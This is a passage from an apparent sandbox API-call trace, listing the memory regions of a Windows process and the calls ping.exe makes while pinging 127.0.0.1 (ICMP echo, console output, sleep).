entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5055 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5056 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5057 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 5058 start_va = 0x8b0000 end_va = 0x8bffff entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 5059 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5060 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5061 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5062 start_va = 0x6d0000 end_va = 0x6dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 5063 start_va = 0x6e0000 end_va = 0x6e3fff entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 5064 start_va = 0x7c0000 end_va = 0x83dfff entry_point = 0x7c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5065 start_va = 0x9f0000 end_va = 0x9fffff entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 5066 start_va = 0xa20000 end_va = 0xb1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 5067 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 5068 start_va = 0x73dc0000 end_va = 0x73dddfff entry_point = 0x73dc0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 5069 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5070 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5071 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5072 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5073 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 5074 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5075 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5076 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5077 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 5078 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5079 start_va = 0x7efd0000 end_va = 0x7f0cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efd0000" filename = "" Region: id = 5080 start_va = 0x840000 end_va = 0x87ffff entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 5081 start_va = 0x8c0000 end_va = 0x8fffff entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 5082 start_va = 0x7f0fa000 end_va = 0x7f0fcfff entry_point = 0x0 region_type = private name = "private_0x000000007f0fa000" filename = "" Region: id = 5083 start_va = 0x73690000 end_va = 0x736d4fff entry_point = 0x73690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 5084 start_va = 0x6f0000 end_va = 0x6f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 5085 start_va = 0x880000 end_va = 0x880fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 5086 start_va = 0x890000 end_va = 0x892fff entry_point = 0x890000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 5087 start_va = 0x900000 end_va = 0x93ffff entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 5088 start_va = 0x950000 end_va = 0x98ffff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 5089 start_va = 0x7f0f7000 end_va = 0x7f0f9fff entry_point = 0x0 region_type = private name = "private_0x000000007f0f7000" filename = "" Thread: id = 277 os_tid = 0x750 [0102.013] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0102.013] __set_app_type (_Type=0x1) [0102.013] __p__fmode () returned 0x76ea1768 [0102.013] __p__commode () returned 0x76ea176c [0102.013] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0102.013] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0102.014] SetThreadUILanguage (LangId=0x0) returned 0x409 [0102.015] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0102.015] _fileno (_File=0x76ea4c28) returned 1 [0102.015] _get_osfhandle (_FileHandle=1) returned 0x28 [0102.015] GetFileType (hFile=0x28) returned 0x2 [0102.015] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x78f260 | out: lpMode=0x78f260) returned 0 [0102.015] GetLastError () returned 0x6 [0102.015] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x78f1c4, nSize=0x50 | out: lpBuffer="䤐¢") returned 0x0 [0102.015] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0102.017] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x78f27c | out: phkResult=0x78f27c*=0x88) returned 0x0 [0102.017] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x78f270, lpData=0x78f278, lpcbData=0x78f274*=0x4 | out: lpType=0x78f270*=0x0, lpData=0x78f278*=0x0, lpcbData=0x78f274*=0x4) returned 0x2 [0102.017] RegCloseKey (hKey=0x88) returned 0x0 [0102.018] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0x78f240*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x78f27c | out: ppResult=0x78f27c*=0xa2c390*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa28a90*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0102.018] FreeAddrInfoW (pAddrInfo=0xa2c390*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa28a90*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0102.018] IcmpCreateFile () returned 0xa26c60 [0102.020] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0xa2c3b8 [0102.020] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0xa35270 [0102.020] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x78f378, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0102.021] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0x78f270, nSize=0x0, Arguments=0x78f26c | out: lpBuffer="竈£ﱀx┗\x94䰨盪❋") returned 0x14 [0102.022] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0102.022] _fileno (_File=0x76ea4c28) returned 1 [0102.022] _get_osfhandle (_FileHandle=1) returned 0x28 [0102.022] GetFileType (hFile=0x28) returned 0x2 [0102.022] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x78f234 | out: lpMode=0x78f234) returned 0 [0102.022] GetLastError () returned 0x6 [0102.022] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x78f198, nSize=0x50 | out: lpBuffer="x❋") returned 0x0 [0102.022] _fileno (_File=0x76ea4c28) returned 1 [0102.022] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0102.022] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0102.022] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0xa37b00 [0102.022] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0xa37b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0102.023] _fileno (_File=0x76ea4c28) returned 1 [0102.023] _write (in: _FileHandle=1, _Buf=0xa37b00*, _MaxCharCount=0x14 | out: _Buf=0xa37b00*) returned 20 [0102.023] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0102.023] _fileno (_File=0x76ea4c28) returned 1 [0102.023] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0102.023] LocalFree (hMem=0xa37b00) returned 0x0 [0102.023] LocalFree (hMem=0xa37ac8) returned 0x0 [0102.023] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x78f270, nSize=0x0, Arguments=0x78f26c | out: lpBuffer="竈£ﱀx▪\x94䰨盪❚") returned 0x18 [0102.023] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0102.023] _fileno (_File=0x76ea4c28) returned 1 [0102.023] _get_osfhandle (_FileHandle=1) returned 0x28 [0102.023] GetFileType (hFile=0x28) returned 0x2 [0102.023] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x78f234 | out: lpMode=0x78f234) returned 0 [0102.023] GetLastError () returned 0x6 [0102.023] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x78f198, nSize=0x50 | out: lpBuffer="x❚") returned 0x0 [0102.023] _fileno (_File=0x76ea4c28) returned 1 [0102.023] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0102.023] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0102.023] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0xa2c390 [0102.023] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0xa2c390, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0102.023] _fileno (_File=0x76ea4c28) returned 1 [0102.023] _write (in: _FileHandle=1, _Buf=0xa2c390*, _MaxCharCount=0x18 | out: _Buf=0xa2c390*) returned 24 [0102.023] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0102.023] _fileno (_File=0x76ea4c28) returned 1 [0102.023] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0102.023] LocalFree (hMem=0xa2c390) returned 0x0 [0102.023] LocalFree (hMem=0xa37ac8) returned 0x0 [0102.023] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0102.023] IcmpSendEcho2Ex (in: IcmpHandle=0xa26c60, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xa2c3b8, RequestSize=0x20, RequestOptions=0x78f2ec, ReplyBuffer=0xa35270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xa35270) returned 0x1 [0102.024] InetNtopW (in: Family=2, pAddr=0x78f2dc, pStringBuf=0x78f404, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0102.024] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x78f270, nSize=0x0, Arguments=0x78f26c | out: lpBuffer="笈£ﱀx⛔\x94䰨盪✣") returned 0x16 [0102.024] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0102.024] _fileno (_File=0x76ea4c28) returned 1 [0102.024] _get_osfhandle (_FileHandle=1) returned 0x28 [0102.024] GetFileType (hFile=0x28) returned 0x2 [0102.024] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x78f234 | out: lpMode=0x78f234) returned 0 [0102.024] GetLastError () returned 0x6 [0102.024] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x78f198, nSize=0x50 | out: lpBuffer="x✣") returned 0x0 [0102.024] _fileno (_File=0x76ea4c28) returned 1 [0102.024] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0102.024] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0102.024] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xa37b40 [0102.024] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xa37b40, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0102.024] _fileno (_File=0x76ea4c28) returned 1 [0102.024] _write (in: _FileHandle=1, _Buf=0xa37b40*, _MaxCharCount=0x16 | out: _Buf=0xa37b40*) returned 22 [0102.024] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0102.024] _fileno (_File=0x76ea4c28) returned 1 [0102.024] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0102.024] LocalFree (hMem=0xa37b40) returned 0x0 [0102.024] LocalFree (hMem=0xa37b08) returned 0x0 [0102.025] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x78f270, nSize=0x0, Arguments=0x78f26c | out: lpBuffer="笈£ﱀx⛿\x94䰨盪✼") returned 0x9 [0102.025] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0102.025] _fileno (_File=0x76ea4c28) returned 1 [0102.025] _get_osfhandle (_FileHandle=1) returned 0x28 [0102.025] GetFileType (hFile=0x28) returned 0x2 [0102.025] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x78f234 | out: lpMode=0x78f234) returned 0 [0102.025] GetLastError () returned 0x6 [0102.025] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x78f198, nSize=0x50 | out: lpBuffer="x✼") returned 0x0 [0102.025] _fileno (_File=0x76ea4c28) returned 1 [0102.025] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0102.025] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0102.025] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa28910 [0102.025] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xa28910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0102.025] _fileno (_File=0x76ea4c28) returned 1 [0102.025] _write (in: _FileHandle=1, _Buf=0xa28910*, _MaxCharCount=0x9 | out: _Buf=0xa28910*) returned 9 [0102.025] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0102.025] _fileno (_File=0x76ea4c28) returned 1 [0102.025] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0102.025] LocalFree (hMem=0xa28910) returned 0x0 [0102.025] LocalFree (hMem=0xa37b08) returned 0x0 [0102.025] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x78f274, nSize=0x0, Arguments=0x78f270 | out: lpBuffer="笈£ﱀx➷\x94䰨盪✧") returned 0x9 [0102.025] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0102.025] _fileno (_File=0x76ea4c28) returned 1 [0102.025] _get_osfhandle (_FileHandle=1) returned 0x28 [0102.025] GetFileType (hFile=0x28) returned 0x2 [0102.025] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x78f238 | out: lpMode=0x78f238) returned 0 [0102.025] GetLastError () returned 0x6 [0102.025] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x78f19c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0102.025] _fileno (_File=0x76ea4c28) returned 1 [0102.025] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0102.025] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0102.025] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa28910 [0102.025] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xa28910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0102.025] _fileno (_File=0x76ea4c28) returned 1 [0102.025] _write (in: _FileHandle=1, _Buf=0xa28910*, _MaxCharCount=0x9 | out: _Buf=0xa28910*) returned 9 [0102.025] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0102.025] _fileno (_File=0x76ea4c28) returned 1 [0102.025] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0102.025] LocalFree (hMem=0xa28910) returned 0x0 [0102.025] LocalFree (hMem=0xa37b08) returned 0x0 [0102.025] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x78f270, nSize=0x0, Arguments=0x78f26c | out: lpBuffer="笈£ﱀx⟘\x94䰨盪✨") returned 0x9 [0102.025] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0102.025] _fileno (_File=0x76ea4c28) returned 1 [0102.025] _get_osfhandle (_FileHandle=1) returned 0x28 [0102.025] GetFileType (hFile=0x28) returned 0x2 [0102.025] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x78f234 | out: lpMode=0x78f234) returned 0 [0102.025] GetLastError () returned 0x6 [0102.025] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x78f198, nSize=0x50 | out: lpBuffer="x✨") returned 0x0 [0102.025] _fileno (_File=0x76ea4c28) returned 1 [0102.025] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0102.025] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0102.026] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa28910 [0102.026] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xa28910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0102.026] _fileno (_File=0x76ea4c28) returned 1 [0102.026] _write (in: _FileHandle=1, _Buf=0xa28910*, _MaxCharCount=0x9 | out: _Buf=0xa28910*) returned 9 [0102.026] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0102.026] _fileno (_File=0x76ea4c28) returned 1 [0102.026] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0102.026] LocalFree (hMem=0xa28910) returned 0x0 [0102.026] LocalFree (hMem=0xa37b08) returned 0x0 [0102.026] Sleep (dwMilliseconds=0x3e8) [0103.027] IcmpSendEcho2Ex (in: IcmpHandle=0xa26c60, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xa2c3b8, RequestSize=0x20, RequestOptions=0x78f2ec, ReplyBuffer=0xa35270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xa35270) returned 0x1 [0103.027] InetNtopW (in: Family=2, pAddr=0x78f2dc, pStringBuf=0x78f404, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0103.027] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x78f270, nSize=0x0, Arguments=0x78f26c | out: lpBuffer="羠£ﱀx⛔\x94䰨盪✣") returned 0x16 [0103.027] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0103.027] _fileno (_File=0x76ea4c28) returned 1 [0103.027] _get_osfhandle (_FileHandle=1) returned 0x28 [0103.027] GetFileType (hFile=0x28) returned 0x2 [0103.027] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x78f234 | out: lpMode=0x78f234) returned 0 [0103.027] GetLastError () returned 0x6 [0103.028] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x78f198, nSize=0x50 | out: lpBuffer="x✣") returned 0x0 [0103.028] _fileno (_File=0x76ea4c28) returned 1 [0103.028] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0103.028] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0103.028] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xa37fd8 [0103.028] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xa37fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0103.028] _fileno (_File=0x76ea4c28) returned 1 [0103.028] _write (in: _FileHandle=1, _Buf=0xa37fd8*, _MaxCharCount=0x16 | out: _Buf=0xa37fd8*) returned 22 [0103.028] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0103.028] _fileno (_File=0x76ea4c28) returned 1 [0103.028] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0103.028] LocalFree (hMem=0xa37fd8) returned 0x0 [0103.028] LocalFree (hMem=0xa37fa0) returned 0x0 [0103.028] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x78f270, nSize=0x0, Arguments=0x78f26c | out: lpBuffer="羠£ﱀx⛿\x94䰨盪✼") returned 0x9 [0103.028] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0103.028] _fileno (_File=0x76ea4c28) returned 1 [0103.028] _get_osfhandle (_FileHandle=1) returned 0x28 [0103.028] GetFileType (hFile=0x28) returned 0x2 [0103.028] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x78f234 | out: lpMode=0x78f234) returned 0 [0103.028] GetLastError () returned 0x6 [0103.028] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x78f198, nSize=0x50 | out: lpBuffer="x✼") returned 0x0 [0103.028] _fileno (_File=0x76ea4c28) returned 1 [0103.028] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0103.028] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0103.028] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa28988 [0103.028] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xa28988, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0103.028] _fileno (_File=0x76ea4c28) returned 1 [0103.028] _write (in: _FileHandle=1, _Buf=0xa28988*, _MaxCharCount=0x9 | out: _Buf=0xa28988*) returned 9 [0103.028] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0103.028] _fileno (_File=0x76ea4c28) returned 1 [0103.028] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0103.028] LocalFree (hMem=0xa28988) returned 0x0 [0103.028] LocalFree (hMem=0xa37fa0) returned 0x0 [0103.028] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x78f274, nSize=0x0, Arguments=0x78f270 | out: lpBuffer="羠£ﱀx➷\x94䰨盪✧") returned 0x9 [0103.029] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0103.029] _fileno (_File=0x76ea4c28) returned 1 [0103.029] _get_osfhandle (_FileHandle=1) returned 0x28 [0103.029] GetFileType (hFile=0x28) returned 0x2 [0103.029] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x78f238 | out: 